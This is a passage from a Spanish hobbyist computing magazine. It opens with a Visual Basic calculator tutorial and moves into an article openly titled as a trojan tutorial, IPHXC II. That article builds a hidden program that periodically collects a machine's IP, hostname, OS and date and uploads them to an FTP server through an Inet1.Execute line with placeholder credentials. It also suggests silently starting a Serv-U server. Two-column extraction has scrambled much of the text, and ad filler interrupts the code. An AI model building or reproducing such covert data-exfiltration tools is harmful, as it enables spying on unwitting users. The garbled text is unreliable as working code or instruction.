  • 30. CURSO DE PROGRAMACION - VISUAL BASIC - CALCULADORA Nosotros lo vamos a hacer, en esta ocasión, estamos indicando que tipo de variable es. de la segunda manera. Al hacer click sobre Cuando decimos "tipo de variable" nos estamos este botón nos va a aparecer un editor de refiriendo al tipo de dato que podrá almacenar. texto. En este editor es donde nosotros Para verlo mas claro, en este caso podremos "picaremos" el código de nuestros programas, asignar una cadena de caracteres a nuestra como ya hicimos en la primera entrega del variable, mientras que si la declaráramos de curso. tipo "Integer" (entro) aquí solo podríamos En esta ocasión vamos a declarar una variable. almacenar datos de tipo entero (numéricos), Para hacer esto, primero debemos indicarle el como podrían ser 1, 2, 1320, 6789..... ámbito. Aquí tenéis un listado de las variables mas utilizadas que podéis declarar en Visual Basic Nuestra variable es de tipo "String" (cadena) ! El ámbito... porque va a almacenar un literal, que será por ejemplo "HXC" El ámbito de la variable nos indica donde puede ser utilizada Para asignar un valor a una variable tenemos esta, es decir, puede ser local al formulario o global (ya que utilizar el operador "=" (en un futuro veremos esto en el futuro) al proyecto explicaremos los diferentes operadores) Para esto debemos acceder a algún evento, ya que es necesario decirle al programa cuando En este caso escribiremos: vamos a realizar la asignación. Por ejemplo, vamos a hacerlo en el evento que dim NombreVariable as String conocimos en el primer curso, "Form_Load". Para llegar hasta él podemos hacerlo de varias "Dim" nos indica, como ya hemos dicho antes, formas, pero para no dar mas rodeos, lo el ámbito de la variable. "NombreVariable" es haremos desplegando los "combos" que el nombre con el que nos vamos a referir a la encontramos en la zona superior del compilador. variable, que puede ser el que vosotros queráis. Desplegamos el izquierdo y vemos que en la "as String", esto es lo más importante. Aquí lista aparece la palabra "form" Página 30 PC PASO A PASO Nº 7
  • 31. CURSO DE PROGRAMACION - VISUAL BASIC - CALCULADORA Código del programa: Dim Var1 As String Private Sub Form_Load() Var1 = "HXC" MsgBox Var1 End Sub 2. Los Objetos: Empecemos la calculadora Para esta practica necesitamos conocer dos objetos: El botón (button) y la caja de texto (textbox). Tanto uno como otro son auténticos Al hacer click veremos que el editor nos añade clásicos en los formularios de cualquier las líneas del evento automáticamente, y aplicación. En la imagen podemos observar también que nos coloca el cursor entre ellas. cuales son estos objetos: El combo de la derecha se ha puesto directamente sobre el evento "load", pero si lo desplegamos, podremos acceder a cualquier evento del Form. Ahora vamos a asignar el valor a la variable, según se puede ver en la siguiente instrucción: Var1 = "HXC" Donde "Var1" es el nombre de la variable que vosotros habéis elegido. Vale, ahora hemos llegado a un punto en el cual deberíais entender que vuestra variable, al ejecutar la aplicación, almacenará el literal "HXC". Para ver esto vamos a escribir justo debajo Para colocarlos en nuestro "Form1" solo tenemos MsgBox Var1 que hacer click sobre el objeto que queremos dibujar y darle forma sobre el formulario (como Ahora ejecutemos con ctr + F5 si estuviéramos haciendo cuadrados en el Paint). ¿Os ha salido el MsgBox con el literal HXC?, Nosotros, como vamos a hacer una calculadora, ¿Sí?, pues entonces lo habéis hecho bien, pero necesitaremos un TextBox y varios Buttons eso no importa, porque esto tan solo es la (tantos como funciones queramos implementar introducción a las variables, así que es en la calculadora). infinitamente más importante que entendáis Probad ahora a poner un botón en el formulario. lo que habéis hecho, y si no es así, volver a ¿Ya está?, pues entonces os debería aparecer leéoslo todo, porque si no, jamás aprenderéis sobre el botón un texto que diga "Command1". a programar. Este es el nombre y descripción que VB pone PC PASO A PASO Nº 7 Página 31
  • 32. CURSO DE PROGRAMACION - VISUAL BASIC - CALCULADORA por defecto a este control. Podéis ver que si si os viene en gana, pero unos nombres añadís otro le llamará "Command2", y un ambiguos provocan dificultades a la hora de tercero sería "Command3". programar. Ahora vamos a cambiarle el nombre y la Para cambiar la descripción del objeto iremos descripción a un botón. Antes de hacer esto a su propiedad "Caption" y cambiaremos el debéis entender que el nombre del botón es contenido, poniendo el símbolo "=", y como nosotros nos hacemos referencia a él comprobando como el texto del botón lo desde el editor del VB, y la descripción adquiere inmediatamente. ("Caption")es el literal que vemos escrito sobre Ahora colocaremos el botón en la zona inferior, el botón, que puede ser el mismo que el arrastrándolo, y crearemos todos los demás nombre. necesarios, pudiendo coger como ejemplo la Para cambiarlo nos posicionamos con el ratón calculadora de la imagen. encima del objeto que queremos modificar (en nuestro caso el botón, pero podría ser cualquier otro). Al hacer click sobre el vemos que adquiere el foco, esto se puede comprobar porque aparecen 6 cuadros pequeños de color azul en el perímetro del objeto. ¿Lo tenemos? ¿Sí? Vamos entonces al cuadro de propiedades del botón. Para los nombres de los botones no nos debemos complicar la vida, por ejemplo, yo los he llamado y cambiamos el texto que hay en la casilla "Cmd1, Cmd2, Cmd3, CmdDiv, CmdIgual, "Nombre", o en su defecto, "Name" en las CmdMas....", así será más fácil distinguirlos. versiones inglesas del producto. Ahora pone "Command1", y nosotros lo vamos a llamar "CmdIgual". La razón de que lo ! Ta m b i é n p o d e m o s . . . llamemos así es porque este botón será el También podemos cambiar tanto el nombre como la símbolo "=" de nuestra calculador, donde "Cmd" descripción al form, para esto haremos exactamente lo es la abreviatura de "Command Button" e mismo que con el botón, click sobre un área descubierta "Igual" es lo que hemos elegido para del formulario y cambiar sus propiedades en el cuadro. identificarlo. También lo podéis llamar "pepe" Página 32 PC PASO A PASO Nº 7
  • 33. CURSO DE PROGRAMACION - VISUAL BASIC - CALCULADORA Hay un detalle distinto en el TextBox, y es que nada. Esto sería así: este no tiene Caption. La propiedad que indica en los TextBox que texto / descripción va a Private Sub Cmd0_Click() tener es la propiedad Text, así que la vamos TxtOper.Text = TxtOper.Text & "0" a buscar y borrar su contenido ("Text1") para End Sub que la caja de texto nos quede en blanco. Si nos fijamos bien vemos que le estamos obligando a poner en la propiedad Text lo que 3. El código: usando el editor actualmente hay en ella mas el "0" (el operador "&" en VB sirve principalmente para concatenar Vamos a empezar a "picar" código. Lo primero cadenas). será pasar el valor del botón presionado a la Si ejecutamos esto y presionamos varias veces caja de texto. Para esto haremos doble click el botón vemos que nos aparecen tantos "0" sobre el primero botón con valor numérico que como clicks hagamos. habéis puesto (el 0). Vemos que rápidamente nos aparece el editor de texto, con el cursor Entonces, el código para todos los botones con activo entre dos líneas de código que el solo números quedaría así nos ha escrito. Este es el evento "Click" del botón, es decir, todo lo que aquí escribamos Private Sub Cmd0_Click() se ejecutará cuando alguien haga click en este TxtOper.Text = TxtOper.Text & "0" objeto. End Sub ¿Y que es lo que queremos que pase cuando Private Sub Cmd1_Click() se haga click? Pues queremos que el valor del TxtOper.Text = TxtOper.Text & "1" botón pase a la caja de texto, y eso lo haremos End Sub así Private Sub Cmd2_Click() Private Sub Cmd0_Click() TxtOper.Text = TxtOper.Text & "2" TxtOper.Text = "0" End Sub End Sub Private Sub Cmd3_Click() Aquí estamos diciéndole que cuando se presione TxtOper.Text = TxtOper.Text & "3" el botón "0" el Text de nuestra caja de texto End Sub (en mi caso "TxtOper") adquiera ese valor. Para probar esto podemos ejecutar con Private Sub Cmd4_Click() "ctr + F5" y presionar el botón que hemos TxtOper.Text = TxtOper.Text & "4" codificado (para unificar espero que todos End Sub escojáis primero el 0). Si habéis hecho bien el ejercicio os aparecerá un 0 en el TextBox. Private Sub Cmd5_Click() TxtOper.Text = TxtOper.Text & "5" Pero esto no es suficiente, ya que aquí estamos End Sub sustituyendo el valor de la propiedad Text de la caja de texto por un número, cuando lo que Private Sub Cmd6_Click() queremos hacer es concatenar el valor que TxtOper.Text = TxtOper.Text & "6" contiene la caja y añadirle el nuevo, sin sustituir End Sub PC PASO A PASO Nº 7 Página 33
  • 34. CURSO DE PROGRAMACION - VISUAL BASIC - CALCULADORA Private Sub Cmd7_Click() variable StrOper cuando alguien presione este TxtOper.Text = TxtOper.Text & "7" botón. Quedaría así: End Sub Private Sub CmdMas_Click() Private Sub Cmd8_Click() StrOper = "+" TxtOper.Text = TxtOper.Text & "8" End Sub End Sub Private Sub Cmd9_Click() ! El operador... TxtOper.Text = TxtOper.Text & "9" End Sub El operador "=" se encarga de asignar valores tanto a variables como a objetos Si ahora ejecutamos tenemos que poder escribir cualquier número. Muy bien, esto parece que empieza a funcionar, Pero se nos olvida algo. Cabe recordar que pero más de uno se estará preguntando: ¿y cuando se presiona un operador en una los botones igual, por, mas, menos...?¿Qué...? calculadora (sea digital o real) se limpia el Pues para estos botones vamos a utilizar una "display" (caja de texto en nuestro caso) para variable. La tenemos que declarar de tipo poder escribir el segundo dígito que va a operar String, ya que va a contener el carácter del con el primero. operador (*,-,/,+). La cosa quedaría así: Algunos pensareis que podemos solucionarlo poniendo TxtOper.Text="" (esta instrucción Dim StrOper As String pone blanco la caja de texto), pero si hacemos esto perdemos el primer valor, así que no podríamos operar. Para no perder el primer ! Si antes de... valor vamos a guardarlo en la variable que anteriormente nos hemos declarado como Long. Si antes de declarar la variable añadimos la cláusula Option El evento quedaría así: Explicit" estamos obligando a que todas las variables sean Private Sub CmdMas_Click() declaradas. Esto es altamente recomendable. StrOper = "+" LngValor = TxtOper.Text TxtOper.Text = "" donde "StrOper" es el nombre que queráis End Sub darle a la variable ("Str" por ser String y "Oper" porque contendrá el operador). Debemos hacer lo mismo en todos los botones Ya que estamos, también vamos a declarar con operadores, guardando el símbolo "-" en otra variable de tipo Long, la cual nos será la resta, el "/" en la división y el "*" en el muy útil en un futuro próximo. producto. Así es como nos quedaría: Dim LngValor as Long Private Sub CmdDiv_Click() Vamos al evento Click del botón "+". Una vez StrOper = "/" dentro de él tenemos que indicarle que este LngValor = TxtOper.Text botón es el que hace referencia a la suma, TxtOper.Text = "" ¿cómo?, pues añadiendo el valor "+" a nuestra End Sub Página 34 PC PASO A PASO Nº 7
  • 35. CURSO DE PROGRAMACION - VISUAL BASIC - CALCULADORA Private Sub CmdMas_Click() Una vez entendido esto, vamos a intentar StrOper = "+" llevarlo a la calculadora. En nuestro botón igual LngValor = TxtOper.Text tenemos dos intereses muy claros, saber el TxtOper.Text = "" valor de StrOper y operar en consecuencia End Sub entre el valor que almacenamos en el primer dígito (LngValor) y el segundo (TxtOper.Text). Private Sub CmdMenos_Click() Entonces, y ya que hoy os he enseñado la StrOper = "-" sentencia "If", os propongo que codifiquéis LngValor = TxtOper.Text todas las posibilidades que pueden haber (estas TxtOper.Text = "" posibilidades ahora solo son 4, suma, producto, End Sub división y resta). Nuestro botón CmdIgual debería cobrar un Private Sub CmdPor_Click() aspecto como este: StrOper = "*" LngValor = TxtOper.Text Private Sub CmdIgual_Click() TxtOper.Text = "" If StrOper = "+" Then End Sub End If 4. Muy importante: Sentencias If StrOper = "-" Then condicionales End If If StrOper = "*" Then Entramos en una parte muy delicada, el botón igual. En este botón vamos a operar, y End If devolveremos el valor a la caja de texto una If StrOper = "/" Then vez obtenido el resultado. Tenemos que estar atentos porque las sentencias condicionales End If son utilizadas constantemente por los End Sub programadores, independientemente del lenguaje y del tipo de programa que se va a Este código hará que, dependiendo del operador realizar. Una sentencia condicional no es más pulsado, entre en una u otra sentencia que una condición, la cual se cumple o no, es condicional, pero solo en una, ya que StrOper decir, la pregunta no puede valer "+" y a su vez "/" . Ahora Si StrOper es igual a '+' entonces codificaremos el código que va entre los "If" Suma (comienzo de la sentencia) y "End If" (final de Fin del Sí la sentencia). Sería una sentencia condicional. Esto traducido a código sería: ! En el caso... If StrOper = "+" Then MsgBox "HXC" End If En el caso de las sentencias condicionales el operador "=" se utiliza para comparar, al igual que > (mayor que) < Aquí estamos diciendo que si la variable StrOper (menor que) >= (mayor o igual que) <= (menor o igual contiene el valor "+" se muestre por pantalla que) <> (diferente). un mensaje. PC PASO A PASO Nº 7 Página 35
  • 36. CURSO DE PROGRAMACION - VISUAL BASIC - CALCULADORA Por ejemplo, en el caso de la suma, dentro de TxtOper = LngValor - TxtOper.Text la sentencia deberíamos poner End If If StrOper = "+" Then If StrOper = "*" Then TxtOper = LngValor + TxtOper.Text TxtOper = LngValor * TxtOper.Text End If End If Sigamos paso a paso lo que esto hace. Primero If StrOper = "/" Then la sentencia "If" pregunta si StrOper contiene TxtOper = LngValor / TxtOper.Text el valor "+". Como nosotros hemos presionado End If este operador, la sentencia dará "verdadero", End Sub por lo tanto entrará dentro y continuará con la siguiente línea de código. Ejecutemos. Si os da errores estaos tranquilos, Entonces llegamos a TxtOper = LngValor + sentaos y mirar exactamente que error es, TxtOper.Text seguro que lo sabéis solucionar. Esto lo que hace es que almacena en el TextBox Si no os da errores, felicidades, probad a sumar, "TxtOper" el valor resultante de la suma entre restar dividir y multiplicar, pero sobre todo, lo que habíamos guardado en LngValor mas probad a añadir mas botones que hagan otras lo que actualmente hay en TxtOper. Cabe operaciones (como un botón borrar que vacié resaltar que para poder efectuar esto, primero el TextBox y la variable LngValor). el proceso matemático resuelve LngValor + Por hoy nada mas, espero que halláis entendido TxtOper.Text y después lo almacena en TxtOper el programa y os halla resultado ameno el de nuevo, ya que si lo hiciese de otra forma curso, me despido de todos vosotros. estaríamos perdiendo el valor de TxtOper antes Un saludo, Pedro del Valle de realizar la suma. http://www.hackhispano.com ! Vemos que... CODIGO DEL PROGRAMA: Vemos que en la línea TxtOper = LngValor + TxtOper.Text Option Explicit hemos omitido la propiedad .Text en el primer TxtOper. Dim StrOper As String Esto lo he hecho para que veáis que sigue funcionando Dim LngValor As Long aunque no lo pongamos, y es debido a que .Text es la propiedad por defecto de cualquier TextBox, aunque yo Private Sub Cmd0_Click() recomiendo encarecidamente que no se omita. TxtOper.Text = TxtOper.Text & "0" End Sub Ahora hacemos lo mismo para todos los Private Sub Cmd1_Click() operadores, quedándonos el botón CmdIgual TxtOper.Text = TxtOper.Text & "1" Así: End Sub Private Sub CmdIgual_Click() Private Sub Cmd2_Click() If StrOper = "+" Then TxtOper.Text = TxtOper.Text & "2" TxtOper = LngValor + TxtOper.Text End Sub End If If StrOper = "-" Then Private Sub Cmd3_Click() Página 36 PC PASO A PASO Nº 7
  • 37. CURSO DE PROGRAMACION - VISUAL BASIC - CALCULADORA TxtOper.Text = TxtOper.Text & "3" TxtOper = LngValor / TxtOper.Text End Sub End If End Sub Private Sub Cmd4_Click() TxtOper.Text = TxtOper.Text & "4" Private Sub CmdMas_Click() End Sub StrOper = "+" LngValor = TxtOper.Text Private Sub Cmd5_Click() TxtOper.Text = "" TxtOper.Text = TxtOper.Text & "5" End Sub End Sub Private Sub CmdMenos_Click() Private Sub Cmd6_Click() StrOper = "-" TxtOper.Text = TxtOper.Text & "6" LngValor = TxtOper.Text End Sub TxtOper.Text = "" End Sub Private Sub Cmd7_Click() TxtOper.Text = TxtOper.Text & "7" Private Sub CmdPor_Click() End Sub StrOper = "*" LngValor = TxtOper.Text Private Sub Cmd8_Click() TxtOper.Text = "" TxtOper.Text = TxtOper.Text & "8" End Sub End Sub El próximo mes crearemos nuestro primer OCX Private Sub Cmd9_Click() (ActiveX control) TxtOper.Text = TxtOper.Text & "9" End Sub PERSONALIZATUMOVIL PERSONALIZATUMOVIL PERSONALIZATUMOVIL MOVIL TUMOVIL MOVIL PERSONALIZATUTUMOVIL MOVIL MOVIL TUMOVIL PERSONALIZATUMOVILMOVIL TUMOVIL MOVIL PERSONALIZATUMOVIL MOVIL PERSONALIZA TUMOVIL PERSONALIZATUMOVIL PERSONALIZA TUMOVIL MOVIL PERSONALIZA TUMOVIL PERSONALIZATUMOVIL PERSONALIZATU MOVIL MOVIL PERSONALIZATU MOVIL PERSONALIZATU MOVIL PERSONALIZA PERSONALIZA PERSONALIZATUMOVIL PERSONALIZATUMOVIL PERSONALIZATUMOVIL MOVIL PERSONALIZATUTUMOVIL MOVIL MOVIL MOVIL TUMOVIL PERSONALIZATUMOVILMOVIL MOVIL TUMOVIL MOVIL Private Sub CmdDiv_Click() PERSONALIZA TUMOVIL MOVIL PERSONALIZATUMOVIL PERSONALIZA TUMOVIL MOVIL PERSONALIZATUMOVIL PERSONALIZA TUMOVIL MOVIL PERSONALIZATU MOVIL PERSONALIZATU MOVIL MOVIL PERSONALIZA TU MOVIL PERSONALIZA PERSONALIZA StrOper = "/" LngValor = TxtOper.Text TxtOper.Text = "" End Sub Private Sub CmdIgual_Click() If StrOper = "+" Then TxtOper = LngValor + TxtOper.Text End If If StrOper = "-" Then TxtOper = LngValor - TxtOper.Text End If If StrOper = "*" Then TxtOper = LngValor * TxtOper.Text End If HAY MUCHOS MAS EN http://pclog.buscalogos.com/ If StrOper = "/" Then PC PASO A PASO Nº 7 Página 37
  • 38. IPHXC II: EL TERCER TROYANO DE HACK X CRACK (PC PASO A PASO) El propósito de este articulo es fundamentalmente crear un programa, con las siguientes características: 1. Que nos envié a un ftp un archivo cada cierto tiempo programable por nosotros. 2. Que ese archivo contenga al menos el nombre del host, su IP, la plataforma Windows sobre la que se ejecuta, fecha y hora. 3. Que el programa "no se vea". 4. Que contenga el menor código posible. 5. Que sea TU programa. 6. Que puedas hacerlo "crecer" 7. Que al final pienses ¡¡¡¡¡Pues si que es fácil!!!!! Si queréis lo podéis llamar "troyano", aunque yo lo llamo IPHCX, un programa para practicar con VB. Antes de meternos en materia, necesitamos saber algunas cosas, no mucho, NO estoy intentando que al terminar de leer esto, te mires al espejo y te digas "Soyunprogramadordivinodelamuerte" No, no sonrías pensando -¡¡¡¡¡Empezamos bien, vaya errata!!!!!-, lo he puesto conscientemente. Antes hemos dicho cual era el propósito de este articulo, ahora te diré cual es el fin. Conseguir llamar tu atención sobre VB, que sepas al menos algunas de sus posibilidades, que "te atrevas" a investigar por tu cuenta, que pienses que algún día te gustaría aprender a programar, que al acabar de leer esto tengamos un programa funcional......solo eso, y te aseguro que no es poco. Entremos en materia que luego dicen que cuento mi vida y me enrollo mucho y que si le doy muchas vueltas y que si la abuela fuma y que...........(ya se me fue la olla). Parto de la base de que habéis leído el articulo foco, que sabéis guardar un proyecto y que de la revista nº-6, y ya tenéis medianamente entendéis y sabéis "compilar" vuestro proyecto claro conceptos como proyecto, controles y para lograr un archivo ejecutable, que sabéis objetos, formulario, eventos y procedimientos, "escribir cosas en los controles del formulario", Página 38 PC PASO A PASO Nº 7
  • 39. IPHXC II - EL TERCER TROYANO DE PC PASO A PASO también haremos referencia a imágenes de la Cada vez que pulsemos el command, el valor revista nº-6. de Ti cambiara, el resultado lo veremos en el caption del label. Ti es una VARIABLE, su valor En VB y en cualquier lenguaje de programación, se modifica cada vez que pulsemos el command. necesitamos utilizar variables, ¿que son¿, Una variable es una ubicación temporal de Antes de seguir, guardar vuestro proyecto, por almacenamiento de datos dentro de un ejemplo creándola dentro de la carpeta c:PVB, programa. Pongamos un ejemplo practico, el y llamarla IPHCX. IPHCX nos tiene que enviar un archivo cada cierto tiempo, necesitamos contar entonces Existen diferentes "tipos" de variables, pero su ese tiempo, crearemos una variable que explicación amplia será en el curso de VB, no llamaremos Ti, para crearla usaremos una vamos ni siquiera a definir que tipo de variable instrucción llamada DIM (Dimensión), es y porque en este articulo. Dim Ti 'declaración de la variable Ti ¿Para que nos puede servir esta variable?, Supongamos que queremos que cuando la Le daremos un valor a esa variable variable Ti valga 10, ocurra "algo", utilizaremos una "herramienta" que se llama expresión Ti=0 'le decimos al programa que condicional, ¿Qué es una expresión condicional? 'Ti tiene un valor de cero Es una parte de una sentencia de un programa que realiza preguntas del tipo verdadero o falso Ahora, ponemos algún control que efectué una sobre una variable, una propiedad o algún tipo operación de suma simple de datos del programa. Ti=Ti+1 Utilizamos para ello operadores de comparación: = igual que Bien, cada vez, que se efectué esta operación <> distinto que Ti incrementara su valor en uno, esto es una > mayor que variable. < menor que >= mayor o igual Mas claro aun, inicia Vb, y en un proyecto <= menor o igual que nuevo, coloca un command y un label, después, copia este código: ¿Para que nos puede servir esto?, Las podemos utilizar en estructuras de decisión,¿Qué son Dim Ti 'declaramos la variable estructuras de decisión? Las estructuras de decisión nos sirven para evaluar una condición Private Sub Command1_Click() en el programa y ejecutar acciones de acuerdo Ti = Ti + 1 'se suma 1 a ellas. Label1.Caption = Ti 'nos muestra en el caption 'el valor de ti Para hacer esto utilizamos la End Sub sentencias(estructura de decisión) IF.....THEN....END IF. Private Sub Form_Load() Ti = 0 Lo mejor es verlo en la practica, volvamos a End Sub nuestro pequeño programa, e incluyamos en PC PASO A PASO Nº 7 Página 39
  • 40. IPHXC II - EL TERCER TROYANO DE PC PASO A PASO el evento click del command1 la siguiente uno en nuestro proyecto, tratarlo como un si expresión: fuera un command o un label para colocarlo en el form, la única diferencia es que cuando If Ti=10 then ejecutemos el proyecto, ese control "no se vera". Shell("calc.exe") 'si no sabes que es esto, para, 'baja las practicas de la revista Expliquemos este control un poco, este control '6 y hazlas responde al paso del tiempo, se suele utilizar para ejecutar acciones a intervalos periódicos End if de tiempo. Entre sus propiedades veamos alguna de ellas. Nos quedara esto: Interval : Especifica el numero de milisegundos Private Sub Command1_Click() que transcurren entre un evento del timer y el Ti = Ti + 1 'se suma 1 siguiente. Este valor puede estar entre 0 y Label1.Caption = Ti 'nos muestra en el caption el 64.767, el mayor intervalo como veréis esta 'valor de ti por encima de un minuto (aproximadamente If Ti = 10 Then 'si Ti es igual a 10 entonces haz lo 65 segundos). No son periodos de tiempo muy 'siguiente, sino, continua con el exactos, dependen del estado de reloj del 'programa ordenador. Shell ("calc.exe") 'acción a ejecutar si se cumple 'la condición El control Timer tiene un solo evento que End If 'fin del bucle de decision también se llama Timer, este evento se dispara End Sub o funciona, cuando la propiedad interval del control timer se completa. Bueno, ejecutemos nuestro programa, cuando pulsemos por décima vez el command1 , la Como siempre lo mejor es poner un ejemplo aplicación calculadora de Windows arrancara en nuestro pequeño proyecto, ya hemos (o cualquier otra aplicación que pongamos). colocado el control timer en nuestro formulario, No te cortes, cambia el valor de la línea If Ti pasemos ahora a modo ver código, pongamos = 10 Then a 15 o 5 y prueba. en el control form, evento Load, (lo que Podemos cambiar también la línea de la acción tengamos en ese evento es lo que ocurrirá al a ejecutar, y en lugar de arrancar la calculadora, cargarse ese form, o sea al arrancar la arrancar por ejemplo servu.exe servu.ini -h aplicación) la siguiente línea: (ojo a la ruta). Timer1.Interval = 1000 Realmente seria complicado tener que pulsar 10 veces un botón para obtener un resultado Con esto lo que hacemos es que al arrancar en nuestro programa, tenemos que poner algo nuestro proyecto, al cargarse (load) ponga en que lo haga por nosotros, y que podamos marcha el cronometro, cuando el timer1 "controlar",¿qué mejor que el "tiempo"?, complete un segundo se active su evento Timer. Disponemos de un control en Vb para ello, se ATENCION, no confundir control y evento timer, llama Timer, si miráis en el cuadro de aunque se llamen igual son cosas diferentes. herramientas -(¿qué?)-, revista 6, pagina 37, veréis un icono que se parece a un reloj o Busquemos en el control timer1 y veamos que cronometro, revista 6, pagina 38, coloquemos el único evento de que dispone es el de timer Página 40 PC PASO A PASO Nº 7
  • 41. IPHXC II - EL TERCER TROYANO DE PC PASO A PASO (en la pagina 39 de la Hasta ahora hemos estado viendo algunas revista 6 tenéis una figura cosas que aunque no veamos realmente para que os puede servir de que nos puedan servir nos serán muy útiles, referencia). ya es hora de que empecemos a ver nuestro En ese evento programa de una manera mas concreta. escribamos lo siguiente En el apartado 1 del propósito de este articulo, Call Command1_Click hablamos de enviar un archivo, pero antes tendremos que crearlo y escribir lo que Esta línea lo que hace es efectuar una "llamada" necesitemos en él, VB tiene para esto una ( Call ) al control Command1 en su evento instrucción que es Open, podríamos utilizar Click. Envía al programa a ejecutar el contenido algo mas adecuado como la función d e l e ve n t o C l i c k d e l C o m m a n d 1 . CreateObject y el método CreateTexFile, pero creo que esa explicación es mas adecuada Al final nos quedara algo así como: durante el curso. No nos olvidemos que los fines de este articulo, aun a riesgo de que algún Dim Ti 'declara la variable lector mas avanzado lo considere excesivamente simple(de hecho esa es la idea del articulo, que Private Sub Command1_Click() sea lo más "simple" posible). Ti = Ti + 1 'se suma 1 Label1.Caption = Ti 'nos muestra en el caption ¿Cómo se crea un archivo, y se escribe 'el valor de Ti en él? If Ti = 10 Then Shell ("calc.exe") Open ("prueba.txt") For Output As #1 End If Print #1,¨hackxcrack¨ End Sub Close #1 Private Sub Form_Load() Expliquemos cada una de las líneas Ti = 0 Timer1.Interval = 1000 Open ("prueba.txt") For Output As #1 End Sub Nos crea un archivo llamado prueba.txt y lo "abre" por el canal 1 para poder escribir al Private Sub Timer1_Timer() principio del mismo. Call Command1_Click End Sub Print #1,¨hackxcrack¨ Escribe lo que tengamos entre comillas, en este caso hackxcrack, al archivo asociado al Ahora ejecutemos nuestra aplicación, veamos canal 1. que sin necesidad de "cliclear" sobre nuestro command, el label aumenta la cuenta, al llegar Close #1 a 10 segundos aproximadamente, arrancara Cierra el archivo asociado al canal 1 de nuevo la calculadora. Lo que hemos hecho es sustituir la intervención del usuario, colocando En nuestro pequeño proyecto, utilizábamos la un control que en función del tiempo que estructura de decisión IF.....THEN....END IF , nosotros estipulemos, realiza una acción. para arrancar la calculadora, borremos la línea PC PASO A PASO Nº 7 Página 41
  • 42. IPHXC II - EL TERCER TROYANO DE PC PASO A PASO Shell("calc.exe") de dialogo, en la ficha componentes, Y en su lugar pongamos Open ("prueba.txt") For Output As #1 Print #1,¨hackxcrack¨ Close #1 Ejecutemos nuestra aplicación, a los 10 segundos mas o menos, se creara el archivo prueba.txt y dentro aparecerá la palabra hackxcrack. Poco útil seria crear un archivo para poner una cadena de texto solo, nosotros queremos mas cosas, entre ellas la IP del ordenador donde se ejecuta, para eso tenemos un control ActiveX en VB, concretamente el control MSWINSCK.OCX. buscaremos y marcaremos Microsoft Winsock ! ¿qué son los ocx?... Control, aquí podréis encontraros con algo diferente, de acuerdo a la versión y el SP que ¿qué son los ocx?, Son archivos que contienen un "mini- tengáis, en mi caso veréis la versión 6.0 , programa" ya "compilado", los tenemos como parte de VB, Service Pack 5. añadidos por Microsoft y otros creados por empresas independientes, si miráis en vuestro ordenador encontrareis Una vez marcado, le daremos a aceptar y nos muchos que no son parte del programa VB, se han cargado aparecerá un nuevo icono en el cuadro de en vuestro ordenador al instalar alguna aplicación, el herramientas, Winsock, coloquémoslo en el programador utilizo un ocx comercial u otro creado por formulario. Al igual que el timer, esto control el.¿Por qué usarlos?, Facilitan la realización de programas no es "visible" en modo ejecución( al arrancar y permiten que diferentes aplicaciones compartan estos la aplicación). archivos. Por ejemplo, supongamos el típico calendario de Windows, en realidad es un ocx, que puedes usar en El control Winsock tiene muchas opciones, diferentes programas, Microsoft lo usa en Access, Word, nosotros para nuestro pequeño ejemplo, solo etc.. utilizaremos dos, que nos proporcione la Ip y el nombre del Host, donde el programa esta corriendo. Si miramos en el cuadro de herramientas no lo veremos, tenemos que incluirlo puesto que por defecto no viene, veamos como, pulsemos ! Este control... con el botón derecho encima del cuadro de herramientas, nos saldrá un menú emergente, Este control es muy completo, tiene muchísimas propiedades del cual seleccionaremos Componentes, interesantes, casi da para efectuar un articulo por si solo, (también podemos hacerlo a través del menú, no quedarse en esta vaga explicación, investigar por vuestra Proyecto-Componentes)nos saldrá un cuadro cuenta. Página 42 PC PASO A PASO Nº 7
  • 43. IPHXC II - EL TERCER TROYANO DE PC PASO A PASO Sustituyamos el texto que pusimos en la línea Print #1, "hackxcrack" Por esto otro Print #1, Winsock1.LocalIP Lo ponemos en nuestro proyecto y a Observar que después de poner el punto os continuación de la línea saldrá como siempre un menú en donde podéis elegir no solo localIP, también otras muchas Print #1, Winsock1.LocalHostName propiedades. Pondremos Ejecutemos nuestra aplicación, cuando pasen esos diez segundos, el archivo prueba.txt Print #1, SysInfo1.OSPlatform contendrá la ip de nuestro ordenador. Ejecutemos nuestra aplicación, nos creara en Hemos dicho también que queríamos saber el nuestro archivo de texto una nueva entrada, nombre del host donde esta corriendo nuestro puede ser parecido a esto programa, a continuación de la línea 169.254.33.198 - la iP Print #1, Winsock1.LocalIP Mimaskina -El nombre del host 2 -el 2 nos indica que es Pongamos esta otra Win NT/2000/XP Print #1, Winsock1.LocalHostName OSPlatform nos devuelve un valor que corresponde al S.O. 'nos proporciona el nombre del host 0-S.O.win sin identificar. Ejecutemos nuestro programa 1-S.O. win95/98/ME 2- S.O Win NT/2000/XP Al cabo de los diez segundos,tenemos en nuestro archivo de texto, la IP y el nombre del ¿Para que puede servir esto?, Puedo darte host. algunas ideas, pero creo que un buen ejercicio es utilizar vuestra imaginación, por Queremos tener también en ese archivo de ejemplo,¿Recordáis la practica nº-1 de la revista texto algunos datos mas, por ejemplo , la 6?, Pues eso. versión Windows que esta corriendo, para ello utilizaremos otro control ActiveX, Este control, tiene otras propiedades como son concretamente, el SYSINFO.OCX, tenemos que OSBuild y OSVersion, nos proporcionan ponerlo en nuestro cuadro de herramientas, información de la versión y S.O., evalúa si los pasos son igual que el anterior, solo que necesitas esa información o no. en este caso seleccionaremos el control Microsoft Sysinfo Control. Podemos ser curiosos y poner alguna aclaración en nuestro archivo de texto, por ejemplo, modificar esta línea PC PASO A PASO Nº 7 Página 43
  • 44. IPHXC II - EL TERCER TROYANO DE PC PASO A PASO Print #1, Winsock1.LocalIP 'IP del host nombre de usuario, ejemplos serian: iespana, terra, lycos, etc. Pues bien, esos son los datos Poniendo lo siguiente que necesitamos para acabar nuestro programa, pasemos a la acción. Print #1, "IP del host ", Winsock1.LocalIP Debajo de la línea Si ejecutamos nuestra aplicación, veremos en Close #1 nuestro archivo de texto, una aclaración: Escribiremos lo siguiente IP del host 169.254.33.198 Mimaskina Inet1.Execute "ftp://USUARIO:PASS@ftp", "PUT 2 prueba.txt " & Winsock1.LocalHostName & ".txt" Solo nos falta escribir en este archivo, la fecha Expliquemos esta línea de forma detallada: y la hora, de la maquina en la que esta Inet1 -es la llamada al ocx corriendo. Para ello utilizaremos las Execute - es el método que ejecuta una solicitud instrucciones, Time y Date. Pongamos lo a un servidor remoto siguiente debajo de la línea "Print #1, ftp:// -protocolo que utilizaremos SysInfo1.OSPlatform 'Plataforma win" usuario -la clave de usuario que usasteis al darte de alta en el ftp 